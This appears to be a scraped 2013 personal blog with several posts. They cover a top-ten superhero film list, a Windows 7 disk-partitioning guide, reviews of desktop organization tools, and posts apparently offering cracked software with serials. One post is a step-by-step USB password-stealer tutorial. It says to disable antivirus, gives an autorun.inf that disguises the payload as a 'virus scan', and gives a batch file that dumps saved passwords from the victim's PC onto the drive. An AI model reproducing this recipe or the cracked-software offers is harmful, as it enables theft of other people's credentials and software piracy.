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Wednesday 24 April 2013

Top Ten Super Heros movies

Top 10 Superhero Movies of All Time


Everyone loves Superhero movies. They are generally movies which don't require you to invest too much intellect or emotion into the story. You are just expected to sit back and enjoy the experience. Most of these movies are big money-makers, and for good reason. People love to enjoy themselves, if you don't know. Entertainment is, in my opinion, the primary goal of going for a movie. If a movie fails to entertain, then I consider it a bore, and won't watch it a second time.
Superhero movies are like a double-edged sword. If they take themselves too seriously, they bore the hell out of audiences. On the other hand, sometimes they are just too corny for their own good (I'm looking at you, Green Lantern and Captain America!). Making a superhero movie is definitely not as easy as some might think.

So, with two great superhero movies set for release in 2013 (Iron Man 3 and Man of Steel), I decided to make a list of the 10 best Superhero movies till date. These are the movies which define the genre, and sometimes, Cinema in general. These are movies which you can watch time and again, and they will entertain you every single time. So sit back, scroll down, and enjoy this Super List (Bad Joke!).

10. X-Men : First Class
The latest movie in the X-Men Series was also a life saver for the franchise. After the disappointing Wolverine origin story (how they managed to ruin such an awesome character is still beyond me), the fate of the series depended on this movie. And it came through with flying colors.
The movie gives you what you would expect from any superhero movie. It has comedy, a bit of emotion, some semblance of a story and loads of great action. The acting is a surprise here, as this genre is not particularly known for it's stellar acting. The special effects were awesome. However, the main reason why this movie is so good, is because of the chemistry between Charles Xavier, Magneto and Mystique (if you don't know who these people are, you are reading the wrong list). The history and the love-hate relationship between Xavier and Magneto is especially great.
And if all this wasn't enough for you, the blink-and-miss guest appearance of Hugh Jackman as Wolverine is just priceless! Watch it for that!
Jennifer Lawrence: Oh, and Mystique is hot! Just thought I'd mention it!
9. Superman -
This is the origin of all Superhero movies. This where the genre started, and it is fitting that it started off with the most powerful superhero in the world, Superman! Without this movie in the list, the legitimacy of the list can be doubted, and I will not have that!!
This is also the movie that immortalized Christopher Reeves as the titular character. That alone should have been reason enough to include this movie in this list. The only reason why it is so low on the list is because of it's dated Special effects, lack of a credible storyline and the ridiculous ending (You just cannot turn back time by rotating the earth in the opposite direction!!).
Other than that, this movie provides a great watch even today...and is certainly more entertaining than the horrible Superman Returns!
8. Iron Man -
Robert Downey Jr. owned this movie. There is no other way to say it. This was the start of all those Marvel Superhero movies, which now seem endless (Iron Man 2, The Incredible Hulk, Thor, Captain America). And it was also the best.
It had some story, which I forget (I didn't say it was a very good story!). It had some great CGI effects, which I remember vaguely. It had the gorgeous Gwyneth Paltrow, who I remember quite clearly. But most of all, I remember the sheer amount of charm Robert Downey Jr. gave Tony Stark in this movie. It is what made this movie so awesome and entertaining.
It quickly made Tony Stark the hero we all hate to love, but are left with no choice but to love him in the end. He is also the only superhero badass enough to reveal his true identity to the world! This movie is one of the most entertaining movie experiences I have had. Never a boring moment!
Iron Man: Fe Male...for all you chemistry nerds!
7. Spiderman 2 -
Sam Raimi really established himself as a credible director with this one. After the fun Spiderman, expectations were set for it's sequel. Spiderman 2 surpassed all those expectations, and how!
This is one of those movies which set a new trend for the genre. The CGI effects were extraordinary (that Train sequence still sends shivers down my spine) and the acting was surprisingly good (Come on, you have Alfred Molina as the villain!). But the real star of this movie was the story. It had a beautifully crafted story, almost rivaling the Dark Knight Trilogy in that department.
Though slightly darker than the first movie, Spiderman 2 retains all the charm and comedy of the first movie. And to top it off, this is the only movie in the franchise that I can still bear to watch (let's not even mention the travesty Spiderman 3 was!).
Spiderman and Dr. Octavius: I hereby knight you, Sir Spiderman!
6. X-Men 2 -
Wolverine is the best character in the X-Men series. No doubt about it. And the Second part of the X-Men franchise concentrated almost entirely on him and his past. This movie is essentially the crowning achievement of this franchise.
A lot darker than the first movie, the lack of comedy is very notable. The movie is filled with great acting from established actors like Hugh Jackman and Sir Ian McKellen. The action sequences are great, and enough references are made to the Comic Books to keep the nerds happy.
This is one of those movies which may seem a little heavy on the first watch, but it is the movie which you'll watch again and again. Without this movie, X-Men would have been an entirely forgettable franchise!
5. Watchmen -
This isn't a very famous movie (Well, not as well-known as the other movies on this list!). But it should be. It is one of the most unique superhero movies I have ever seen. Right from the ambiguity of the story, the great acting and the superb music....this movie is different. The direction by Zack Snyder is great, and the movie, though slow, always has a sense of purpose.
Based on the Graphic Novel by the legendary Alan Moore, this story is set in a world where USA and Russia are on the verge of a nuclear war, and the lines between good and evil have faded completely. It asks the audience whether the means justify the end, and whether justice is more important than mercy. This is a Superhero movie which asks the audience to get involved and rewards them for it.
Watchmen is a movie which I watch rarely. Not because I don't like it. But because it takes a toll on my emotions. Rest assured, you must watch this movie at least once. It is the darkest superhero movie you'll ever see, and it will change your perception of the genre forever.
 Dr. Manhattan: This blue dude is naked for the entire goddamn movie...Dark Stuff!

4. Superman II -
Ah! Another Sequel which is better than the Original, They seem to be popping up in this genre, don't they? But what can I do? Superman II took things to a whole new level. For one thing, Superman was overmatched by three Kryptonian villains, headed by their leader, General Zod.
While Christopher Reeves was the star of the first movie, Terrence Stamp was the star of the sequel. His presence, and his awesome voice, overshadowed everybody else. The story was definitely there, but it was not very strong. The special effects were surprisingly good, and hold up well even today. The music by John Williams is, of course, legendary.
This was the movie that ultimately provided the blueprint for Superhero movies, and established it as a credible genre. This is the movie which has stood the test of time, and is a must-watch for any fan of the genre!
General Zod: Legendary!
3. Batman Begins -
Here it is at last! In the Top 3! That's how high I rate Nolan's vision of Batman's origin story. This movie is an origin story in the truest sense. Nolan explained in great detail how Bruce Wayne became Batman, and where he learned to fight like a ninja (because he is a goddamn ninja!).
This is the movie that embarked us on a journey to see what Batman really was. Make no mistake, this was a completely serious movie. The comedy and the jokes were few, and served to break the tension at the right places. The cast was chosen perfectly, and the action sequences were choreographed brilliantly. The story was as realistic as it could be for a superhero movie. This was Batman as we had never seen before, and Batman as he was always meant to be seen!
Christopher Nolan made a superhero movie unlike any other. It could have failed miserably. Thank God...audiences loved every bit of it!
2. The Avengers -
This is how Superhero movies were meant to be. Fun! And it doesn't get any more fun than The Avengers. After a series of Marvel movies, each more disappointing than the last, I was apprehensive about how good this movie would be. It seemed to be too ambitious for it's own good.
I was wrong. This movie doesn't have a single dull moment within it. It has some semblance of a story, but that is unimportant. Filled with loads of jokes (courtesy Tony Stark), a good villain (Tom Hiddleton was surprisingly good in this role), and extravagant action sequences, this movie is one hell of a ride from start to finish. And Joss Whedon has done an excellent job at writing and directing.
Another reason why this movie is so great is because it broke the trend. While Superhero movies were getting darker and darker (thanks to Nolan), this movie went back to entertaining it's audiences in the most obvious and in-your-face manner. I love this movie, and I'm sure any fan of the genre will love it too!
The Avengers: Tony Stark owns this movie...these are just fillers!
1. The Dark Knight -
The Number 1 spot! And what better movie to award it to, than The Dark Knight? Is there a better superhero movie? NO! Is there a better movie at all? Very few!
This movie is for our generation, what Superman II was for the last generation. This is the movie which will be the blueprint for future movies in this genre. This is the movie which is now the Gold Standard, and all other superhero movies will be judged against this one. A great storyline, one of the best movie villains of all time, and awesome direction is what makes this movie great. This is one of those rare movies where the limelight is not on the hero, but on the villain.
Christopher Nolan has excelled himself as a director, keeping the tension tight right till the end. This is less of a superhero movie, and more about an analysis of human nature. If you haven't watched this one (yeah, all three people in the world), then you are lucky. You have something great to look forward to!
The Dark Knight: Look...even the poster has only The Joker on it!

Thursday 14 March 2013

How to make a new partition without farmating.

Guidelines and procedure for the entire operation to be carried out successfully to Partition Hard Drive in Windows 7

  • First of all go to “ Start ” and then on the window that appears search for ” Computer” and then once you right-click on it another window opens and then you should navigate to the option “ Manage “.
  • At once a new window will open entitled  “Computer Management“. In this new window click on “ Storage ” and then go to “ Disk Management “.
  • The completion of the second step will give you a view of all the drives present in your computer.
  • Among these select the one you want to partition. Then right-click on the selected drive and navigate to the option ” Shrink Volume.. “.
  • A new window should open in which the size of the drive before shrink will be mentioned and the available space to shrink will be mentioned , and in the next line you will be asked to enter the amount of space you want to shrink and this will be the size of the new partition.
Caution : The space you enter must be within the limit of the available space displayed above.
  • After entering the values click on the option “ Shrink ” and wait for the process to complete. The time taken for the operation may be long depending upon the size of the disk and the space to be shrunk. Once the operation is completed a window appears showing unallocated space and the value is exactly the one you entered earlier. Select this unallocated space and on right clicking on it click on the option “New Simple Volume “.
  • A wizard will open up. Go through the wizard and fill in the values required. Usually the value needed to enter is the same one that you entered as the volume to be shrunk.
  • The drive newly created needs a letter to be assigned to it. Assign any letter of your choice as it does not make any difference.
  • A Format page will appear and in it carefully notice that the File System selected is “NTFS ” . After this is done enter a name for your drive and then click on ” Next ” and then “ Finish “.
You have reached your goal. You have partitioned your Hard Drive in Windows 7 without formatting your computer and without the use of any software. Feel free to drop your comments in the comment box.
The complete video tutorial:
* Update: This article was written on the basis of a test in Windows 7 Ultimate version. But after getting the readers feedback, it seems that the procedure does not work fine in the other versions of Windows 7 like Home Premium etc. So please make sure that you are using Windows 7 ultimate before applying this method to partition the hard drive.
** Update: While the procedure works fine in Windows 7 Ultimate version, it does not work in Windows 7 home, starter or other versions properly if the number of partitions exceeds 4. That means if you try to create a new partition that is no. 5 in your hard disk, this process will not work otherwise it will work fine. So if you are in Windows 7 Home or starter edition, make sure that your total no of partition is three before you go for a new partition.

Friday 22 February 2013

How to Steal password using your USB Drive

usb password stealer

Step 1:

Your Antivirus Must be Disable while you are creating USB Sniffer.

Step 2:

Creating your own RootKIT to sniff passwords from Computers required some tools. Following Tools are used to create RootKIT.
Mail Passview
IE Passview
Password Fox
Protected Storage Passview 

Step 3:

After Downloading all the Tools you just have to copy mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exeinto your USB drive.
Step 4:

Open Notepad and Copy following TEXT in it.

" [autorun]open=launch.bat ACTION= Perform a Virus Scan "

Save the notepad as autorun.inf on your USB Drive.

Step 5:

Now again open notepad & type

. "start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt " .

Save notepad as Launch.bat this time on your USB Drive.

Step 6:

To check whether it’s working, first try it on your own PC. Insert USB then AutoRUN Pop-up appears.

Step 7:

Click on Perform VIRUS Scan & that’s it. Passwords saved in your PC will be saved in your USB Drive.

Monday 18 February 2013

Run two Internet connection At one Amazing but true..

Posted Image

Imagine working without interruption. Imagine downloads at incredible speed. Imagine your Internet, faster.

I am excited to announce that with the combined efforts of our entire team, we have created software that links multiple Internet connections together for maximum speed and increased reliabilityMeet Connectify Dispatch.

This new, revolutionary software will give you the ability to connect to multiple Internet connections simultaneously. Combine any number of Wi-Fi networks, mobile Internet devices, and other networks, for a single connection that is as fast as all of your Internet connections combined. Even if connectivity is lost on one network, Dispatch will keep you online by seamlessly moving your web traffic onto the working connection until your secondary network becomes available.,... Registered Virsion Please Comment......... REmember me...Galaxysoftwares

Thursday 14 February 2013

NovaBACKUP Professional (registerd) v12.5.9 Multilingual Incl Serial

NovaStor - Backup & Restore

Backup Software for Windows PCs, Laptops, and Workstations.   More Info

System Requirements

Pentium 4 or better, 512 MB of RAM minimum, 3 GB free hard drive space minimum, Internet Explorer 7.0 or higher, TCP/IP network, additional hard drive space is required for backup to disc and CD/DVD.

Windows 7 Desktop tools

Multi Desktop SoftwareMiniFrame.comLeading edge software in order to multiply your Desktop
Everyone loves clean environment, but not everyone loves cleaning, especially when you hope your every minute could be dedicated to perform better, and possibly earn more income in your dailyjobs. But sometimes, cluttered desktop just overwhelms you and eventually brings you the doom when you try searching files. Trust me, I am the victim, and that’s why I want to dedicate this post to help you organizing your desktop effectively.
desktop customization tool
In this particular post I won’t be giving spiritual tips on cultivating your organization soul, but showcase to you 10 practical desktop customization tools, each with distinctive features and concepts to help organizing your Windows desktop with two ultimate aims: to make your desktop cleaner, and to help your file searching much easier.
I guarantee that you will become passionate on desktop organization with these customization tools, as in the end these tools will get you triumph for your cleaner and fabulous desktop, and every time you search for your files you will thank yourself for using them. Happy organizing and customizing!
For certain software, if you’re a Windows 7 user, you might need to right click on the installation file and choose the option “Run as Administrator” in order to install the software.
Looking for more tools to gear up your Windows? We’ve picked up the best possible gears for you!


Have too much icons and shortcuts on the desktop but too lazy to organize them? That’s the most common scenario for desktop users. Fear not, for Fences is developed to help you arrange the desktop icons in a far more intuitive, organized way.
Upon the first launch the software will automatically help you organize existing icons into several dark transparent tabs, but you can organize them manually with flexible options, such ascreating your own tab with a specific category name and put anything related into it. Best of all, if you’re just too lazy to even click on the icon for organization, you can hide all of them with just a click away!


If you’re a fan of Mac OS X’s docking bar, ObjectDock allows you to have the dock with similar functions to the Mac’s docking bar, even if you’re using the free version! And it’s possibly more beautiful than Mac’s dock!
Just as how the Mac’s docking bar functions, you can put application or folder shortcuts into your dock, display running applications on it, enable and adjust their zoom effects and sizes, and ultimately position your dock on any edge of the screen! These features will significantly saves up your desktop space, and you can also grab your applications and folders easily by just looking on the bar!
Similar to most desktop customization tools, you can obtain your favorite skins from the application’s official theme site, but what I really love is the fact that it allows me to get the software or folder I want without searching in my desktop!


Now hear me out, RocketDock is very similar to the ObjectDock, but there are reasons that I feature it: It has extensive features to not only allow you to create a more organized docking bar, but alsotransform possibly every element of the dock into something sleek and potentially sexy as well!
Just like the ObjectDock, RocketDock also supports alpha-blended PNG and ICO icons with amore user-friendly settings panel, and that means you can download those extremely sleek icon packs and change them to please your eyes! Cleaner interface with appealing look is what we the Windows users ultimately seek for, right?


Tiles allows you to quickly view and manage your applications by simply looking at the edge of your screen, but it has more than it promotes.
With Tiles, you can drag any software, file or folder you use or open often into its Windows 8-styled sidebar. You can also click and swipe though the pages to view a different set of icons, or tonavigate the software that you’re using.
The Tiles doesn’t have to be on the right side, you can customize its location, size and even its behavior like “Group windows from the same process together“. Have fun on exploring it, and you will discover that a feature-rich sidebar is all you need to keep your desktop organized!


With Dexpot, every Windows user can finally embrace several virtual desktops for placing different set of applications. For example you can put all your designer’s software and folders into one virtual desktop, while placing your developer’s applications on another virtual desktop. This is extremely helpful if you have different types of jobs or projects running on.
What’s really awesome is that the Dexpot provides you tons of flexible features and settings that you can even set multiple methods to switch between the virtual desktops, and also customize everything from simple transition effects to slightly complicated desktop elements. But keep this in mind, the software is developed in the way that it should be keeping your desktop organized, so don’t ever mess up all of your virtual desktops!


You can’t imagine that a 1.3 Megabytes software can change your desktop into something epic entirely, and it is Rainmeter.
Rainmeter is a full-fledged desktop customization tool that provides you the ability to customize almost every portion of the desktop along with its extra widgets as well. The software is very famous within the design community due to its flexibility, user-friendliness, and the epicness invoked from the user-created skins. With Rainmeter, you could adopt rich options of clean user interface, and even ends up getting rid of desktop icons, just because it is too beautiful to put the icons!
That said, besides its original skin, you can also search through the web to download theRainmeter skins for more choices of appearance and widget, and if you invest more time on learning its advanced customization techniques, your only limitation will be your imagination!

Emerge Desktop

If you can’t organize your desktop, how about restricting the ability to put anything on the desktop? Emerge Desktop could be your discipline teacher.
emerge desktop
Following the reboot, Emerge Desktop will hide any icon on the Desktop and take away the ability to place anything on it. With the trade you will get a full-fledged context menu with a right click, and it will be your best companion, since the menu allows you to access to possibly anywhere in your Windows.
Restricting the icon placement on desktop is just one of the many features included in this software, in fact it also comes with helpful applets, commands and themes to gear up your productivity, but what I really love is that I will not be able to do the worst thing on the desktop again – put icons everywhere.


Stick organizes your desktop with a fresh technique that utilizes the tab concept. It has generally 3 types of tabs: News FeedNavigator and Notes.
News Feed and Notes are quite self-explanatory, but Navigator is pretty interesting: while it can be used to navigate your existing folders, it can also serve as a web browser!
The beauty of this software is that if you have finished reading or navigating the content, you can just click on the tab and it will hide the content without closing it, and the tab will stick on the top of your desktop. With this approach, you can view the tab any time you want, just click on it! Imagine the space you can save up by constructing a folder directory within the tab, or the time you can save from searching your content here and there in your computer!


Be creative. Eventually you’re just too tired of moving the files and folders here and there in order to keep the desktop organized. Now, what if you can organize your file into folder directory with just 2 clicks away? MyFolders is the software to do it!
With MyFolders, you get to define folder destination in the context menu existed with a right click for easier future access. This could save a lot of desktop space since you could just place the folders you want to access into the menu.
Furthermore, if you want to move certain file to the defined folder, you can just right click on the file, hover to “MyFolders” > “Move To” > (Folder Name), then your job is done! No cluttered windows!
Besides the “Move To” ability, there’s also a “Copy To” function in case you want to duplicate certain file into different folders, which is probably another great feature that could potentially speeding up your desktop organization process! Well, an extremely easy solution for the overwhelming issue!


It’s not really a desktop organization/customization tool, really, but it guarantees you an instant access to anything you want in your Windows, especially when you gave up to organize your forever-artistically-cluttered-desktop! It’s pretty easy and intuitive to use, but it’s better for you touse it 30 or 60 minutes after installation, since it needs time to create the search catalog.
To use the Launchy, you can just press on ALT + SPACE to fire up the application, then type the name of the software, file, or folder you want to search, and the Launchy will display to you the possible results. And heck, if you’re an advanced user, you can even use it to execute commands other than launching application!
Basically Launchy can search general executable files, but if it failed to do so you can add the file catalog manually by clicking on the gear-like icon on its interface, then access to “Catalog” and click on the “+” button to add a directory path, then press “Ok” and eventually “Rescan Catalog“. You can also include other file types by tweaking the settings in the same settings window!
Now you can just put all your files and folders from desktop to the folders located anywhere in your Windows except desktop, and call them through Launchy anytime you need them!